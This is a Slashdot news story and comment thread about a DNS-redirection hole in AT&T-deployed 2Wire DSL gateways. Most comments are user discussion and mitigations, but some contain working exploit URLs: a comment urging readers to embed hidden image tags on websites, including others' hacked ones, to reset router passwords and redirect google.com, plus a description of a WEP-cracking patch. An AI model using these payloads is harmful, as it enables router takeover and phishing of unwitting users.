

AT&T, 2Wire Ignoring Active Security Exploit [Updated] 134
An anonymous reader writes "2Wire manufactures DSL modems and routers for AT&T and other major carriers. Their devices suffer from a DNS redirection vulnerability that can be used as part of a variety of attacks, including phishing, identity theft, and denial of service. This exploit was publicly reported more than eight months ago and applies to nearly all 2Wire firmware revisions. The exploit itself is trivial to implement, requiring the attacker only to embed a specially crafted URL into a Web site or email. User interaction is not required, as the URL may be embedded as an image that loads automatically with the requested content. The 2Wire exploit bypasses any password set on the modem/router and is being actively exploited in the wild. AT&T has been deploying 2Wire DSL modems and router/gateways for years, so there exists a large vulnerable installed base. So far, AT&T/2Wire haven't done anything about this exploit." Update: 04/09 17:48 GMT by KD : AT&T spokesman Seth Bloom sends word that AT&T has not been ignoring the problem. According to Bloom: "The majority of our customers did not have gateways affected by this vulnerability. For those that did, as soon as we became aware of the issue, we expeditiously implemented a permanent solution to close the vulnerability. In fact, we've already updated the majority of affected 2Wire gateways, and we're nearing completion of the process. We've received no reports of any significant threats targeting our customers."
I'm just glad... (Score:2)
Re: (Score:2, Funny)
Re: (Score:2, Funny)
Re: (Score:3, Funny)
Re:I'm just glad... (Score:5, Funny)
+++ATH0
Re: (Score:2)
NO CARRIER
could cause a hang up.
Re: (Score:3, Interesting)
I'm not sure I get the joke, but if it's funny, it might be even funnier that, IIRC, I have a model with a lower number. With the exception that it doesn't reset/resync after a power failure, I guess it works likes it's supposed to.
On the other hand, I am concerned that should the little bugger fail, I'll have to purchase a newer model. Which means I'll end up with something with a metric ton of unwanted features.
I know this isn't Ask Slashdot, but does anyone know
Re: (Score:2)
Re: (Score:2)
Re: (Score:2)
Sigh
A URL should be an address, a picture should be a picture, and a song should be a song and none of the above should be DOING anything
Re: (Score:2)
Sigh
A URL should be an address, a picture should be a picture, and a song should be a song and none of the above should be DOING anything
Re: (Score:1)
Re: (Score:2)
Re: (Score:1)
Re: (Score:2)
I got the WRT54G before there was an L edition. I have been running HypreWRT thiobor on it, but that project seems to have disappeared so I may need to go to OpenWRT at some point.
My folks have a 2Wire, I'll have to be on the look-out for
Re: (Score:1)
Re: (Score:3, Interesting)
Re: (Score:2, Funny)
Telus gave me a 2WIRE (Score:2)
He said "well hey, tha
Sasktel customers (Score:2)
Re:Sasktel customers (Score:5, Informative)
Re:Sasktel customers (Score:5, Informative)
Re: (Score:2)
Re: (Score:2)
I've always found that site to be invaluable when dealing with any and all broadband issues; free tools to test your connection speed and security, as well as finding information about everthing from regulatory politics, technical support, etc to comparing how well your service performs compared to the guy who lives in the next city over.
They also have some very informative forums as a lot of people who work on the technical fron
Re: (Score:2)
Re: (Score:1)
Even substituting the correct address does not help. I can't get this exploit to work with a SaskTel unit. Some of them get to SaskTel's MDC console, for which the password is not publicly available. I'm sure it could be exploited if that became known.
Re: (Score:2)
Anybody have any ideas... (Score:3, Funny)
Re: (Score:3, Funny)
Re:Anybody have any ideas... (Score:5, Funny)
Re: (Score:3, Insightful)
Re: (Score:1)
Re: (Score:2)
Looking inside mine, they have 3 loop antennas, and it seems to have the best coverage from the "front" of the gateway.
And a friend of mine had a linksys adapter that had a jacked up non-standard 802.11g implementation and it only connects to a 2wire when it's set to b only m
Re: (Score:2)
sweet... (Score:1)
Funny Post (Score:3, Funny)
Exploit SOCKS,
Me put malware
On your box!
Re:Funny Post (Score:5, Informative)
Re: (Score:2, Insightful)
Re: (Score:2)
Okay, bcat, are you saying that I can minimize my danger level by clearing all cookies each time I leave my bank's site? I have Firefox set to clear each time I log out; but that may not be enough?
Not really. A DNS server takes a name and gives you the 'physical' server that will give you that page. So if I route all your pages to my physical computer I can download the real page and send it to you as the real deal. Of course someone less honest might check the data that was entered before it passes it back.
OK, now we all know (Score:2, Interesting)
What's these bastards' excuse for standing around with their thumb up their bum for eight months while people get their lives turned inside out?
I smell lawsuits. Many, many lawsuits.
Re: (Score:3, Insightful)
Hell, the security flaws typically affect the customer. Will that stop most people's internet addictions?
Here's anot
Re: (Score:1)
There's always the possibility that it might brick the modem... But it's not a 100% chance. It's not even a good chance. Also - those modems do not cost 100 bucks, even after you include tech support man hours and shipping costs...
I can't see the post you're replying to, so I can only guess that the firmware exploit is what you're referring to, but they
Exploit doesn't seem to work on my 2700HG-B (Score:5, Informative)
Re: (Score:1, Informative)
Perhaps the hacker could change the password, then follow it up with a DNS entry.
Re:Exploit doesn't seem to work on my 2700HG-B (Score:5, Informative)
Try logging in to your router, open a new tab, and click on that link again and see if it works.
Re: (Score:3, Interesting)
I'm sure that if I was already logged into my router, that link would work, because I know the 2wire uses cookie based authentication.
But why on earth would I be logged into it??? Its status pages do not require a login, so the only reason to log in would be to change something, which happens maybe once a year. And the session times out after a few minutes.
TFS (The Fine Summary) says "the 2Wire exploit bypasses any password set on the modem/router" which is blatantly false: apparently it works only
Re: (Score:3, Informative)
(replying to myself...)
Ok, I see the problem now: although just about every setup page imaginable on the router uses a session cookie to make sure you have logged in, the "set initial router password" page does not, and does not care if an initial password has already been set (stupid!).
So the 'sploit is to first invoke the "set initial router password"
If you have a website, paste the following code (Score:3, Interesting)
If you want to join into the phun, put the following onto your website (or onto somebody else's website, if he happens to still use IIS):
<img src="http://192.168.1.254/xslt?PAGE=H04_POST&PASSWORD=admin&PASSWORD_CONF=admin" width="1" height="1" alt="haha"/>
<img src="http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=google.com&ADDR=158.64.72.228" width="1" height="1" alt="haha"/>
<img src="
Re: (Score:1)
In related news... (Score:2)
I'm not suprised, given my experience with 2wire (Score:4, Interesting)
One of the worst routers I have ever had. Besides resetting itself arbitrarily, it would forget it's own settings and revert to the default, or half of the settings would revert to the default and the other half.... ? Also, right before I threw it out my window, it forgot it was a wireless router completely. I mean, it reset itself one last time and quit broadcasting completely. Even the setup pages lost the wireless part. I could manually enter in the wireless setup URL, and it would show one with random values in each field.
I'm just waiting for a nice cooler day to take it to the shooting range. The manual traps and some shotgun pellets might make up for all my anguish.
Re: (Score:2)
Yep (Score:2)
Re:I'm not suprised, given my experience with 2wir (Score:2)
Mod Parent Up! (Score:2)
i've worked with these things (their 2700 gateways). they're great modems (though really really sensitive to surges), but these guys do not know how to design the router side. go above a couple hundred connections, and it crashes it (hitting "refresh all" in the CS server browser will do this almost every time). try to transfer files between wired and wireless (or vise versa) and it slows to a crawl. best idea is put the damn thing in bridge mode and get a real router.
I've got a 2701, and the thing just falls completely apart whenever I use BitTorrent. I thought it was issues with the terrible connection which I have (12-9 dB SNR), so I called a tech out to fix it (improving it to 15-12 db), but that didn't do much.
I've often suspected the router itself due to the fact that this never happens when I'm maxing out my internet connection with only a couple of transactions, but that settles it. I'm getting a new router.
Re: (Score:2)
That is a feature to keep bittorrent traffic manageable.
Re: (Score:2)
the problem is the NAT software basically eating all the memory and it effectively kernel panics, with sometimes interesting results. i saw one instance where doing that would cause it to temporarily toss the bandwidth limiter an
Re: (Score:2)
What they have added is there own DNS server, which is a bit rubbish.
In defence of 2Wire, the grandparent's problems sound like a hardware problem to me. The flash memory seems to have been dying.
The one thing about the 2700 series is that they *WILL* get you about a 1Mb/s increase in ADSL connection speed over other modems and with long lines this can make a real difference.
Re: (Score:1)
Also the routing is screwy, it won't route my external IP address from inside the network so I can't use my domain name to log into my server when I'm home. What a joke.
Re: (Score:1)
Bridge Mode (Score:5, Insightful)
Re: (Score:1)
Re: (Score:2)
Re: (Score:1)
Sure there's another choice. You can always attach another router to it which does DNS recursion (not forwarding). Or do the DNS recursion on your computer with BIND 9 or other software.
Re: (Score:3, Funny)
Re: (Score:2)
Re: (Score:1)
I'd rather take my chances with administering DNS software on my network than risk using a vulnerable router, anyway.
Re: (Score:2)
My concern about running BIND locally is that there will _always_ be another patch, and unless there's somebody dedicated to keeping it patched, it's going to fall behind.
Re: (Score:1)
Re: (Score:1)
It takes some set up , and some care in the set up but maintenance is nil.
I left one ISP somewhat perplexed when he tried to convert me to PPOE. I found an ISP in Portland OR (DSL only)that will provide bridge mode and we linked up.
Re: (Score:2)
Re: (Score:1)
Large install base (Score:2, Interesting)
Re: (Score:2, Insightful)
Re:Large install base (Score:5, Informative)
You're closer to the truth than you know. They use 64 bit (i.e. 8 byte) WEP by default, which is really 40 bit (i.e. 5 byte) WEP since three of those bytes are the IV and broadcast in the clear. However, 2WIRE has an awful policy of printing the WEP key on the side of the modem in hex format and not using the digits A through F.
So the default key, written in hex, is a "decimal" number somewhere between 0,000,000,000 and 9,999,999,999. That's only 10 billion possibilities, or about 33.2 bits of entropy. Your computer can crack through that in a day or two with only three or four captured packets.
When I discovered this (and, of course, got stonewalled by 2WIRE), I wrote a patch for aircrack (now aircrack-ng) that programs it to search only the binary coded decimal keyspace. I named this option -t in honor of "Two Wire" for their terrible security.
Re: (Score:2)
Re: (Score:1)
from the DSL reports forums (Score:5, Informative)
Here is a short summary:
First, change the IP scheme that the 2wire is using for your home network. Specifically, change the IP address of the 2wire router itself. This will prevent attacks against 192.168.1.254.
Next you have to prevent attacks against the domains "home" and "gateway.2wire.net". You can do this a couple of ways. You can modify your hosts file and point those domains to 127.0.0.1... or you can hardcode the dns settings into your computer so that your computer is not using the 2wire to resolve domain names.
Of course the bottom line is 2wire needs to plug this hole. When will that happen? Who knows.
Re: (Score:1)
Re: (Score:2, Interesting)
http://192.168.1.254/xslt?PAGE=A05_POST&THISPAGE=A05&NEXTPAGE=A05_POST&ENABLE_PASS=on&PASSWORD=NUEVOPASS&PASSWORD_CONF=NUEVOPASS [192.168.1.254]
you can change the commands to do a number of different actions (pretty much any configuration change on any page in the router)
eg:
Add names to the DNS:
http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.example.com&ADDR=12 [192.168.1.254]
Re: (Score:2)
Re: (Score:1)
So what would happen in worse case to a default router is it could have it's configuration changed.. whether it matters to you is dependant on how much access you give that router t
Re: (Score:1)
sounds like it. Apparently only if you changed the default ip address of the 2 wire box, or had a reason to not use the DNS cache from within it, would this have helped deflect this vulnerability. (after all, NAT still lets you "out" to the router, where the vulnerability is.)
Although it appears firefox with script block would have stopped this.
2Wire routers also very weak on WEP (Score:5, Interesting)
Re: (Score:3, Informative)
Re: (Score:1)
From a user perspective, I can't blame them. You wouldn't want to be on the phone with someone who thinks their wireless "DHL" modem doesn't need power because it's wireless, and try figuring out what those tiny letters are
I think it would have been a lot more secure if they had used phrases that added up to 26 characters instead. But really, not many manufacturers have the balls to support secure wep by default
Re: (Score:2)
2Wire don't sell retail, they only sell to ISPs and produce custom firmware for them (which, in some cases can tie the modem to the ISP).
Re: (Score:1)
You just lost credibility. Instead of riding around on a bike running scripts you ripped off the internet and feeling all 1337 and shit, you should read more about how to program.
A "hard-coded" configurable parameter.. heh, you one funny script kiddie!
Re: (Score:2)
Re:2Wire routers also very weak on WEP (Score:4, Interesting)
of course they won't care?! (Score:2)
Re:of course they won't care?! (Score:5, Funny)
Re: (Score:2)
AT&T is evil, not just the normal corrupt incompetence of every big phone company, but they actively engage in wrongdoing.
Liability Issues? (Score:1)
I mean, if it is that AT&T has deployed customer equipment with known exploits, I would think the user would be limited in their liability - or so it seems to a rational mind. Not only is this bad news for consumers as a whole but it is just as bad - if not worse - for businesses such as the small businesses that use these modems/routers.
There's one other exploit... (Score:2)
I've seen this with my own eyes dozens of times.
Modem or Router? (Score:2)
The fact that a box attaches to a PC for Internet access doesn't imply it is a modem.
Re: (Score:2)
Telus (Score:2)
Re: (Score:2)
Re: (Score:2)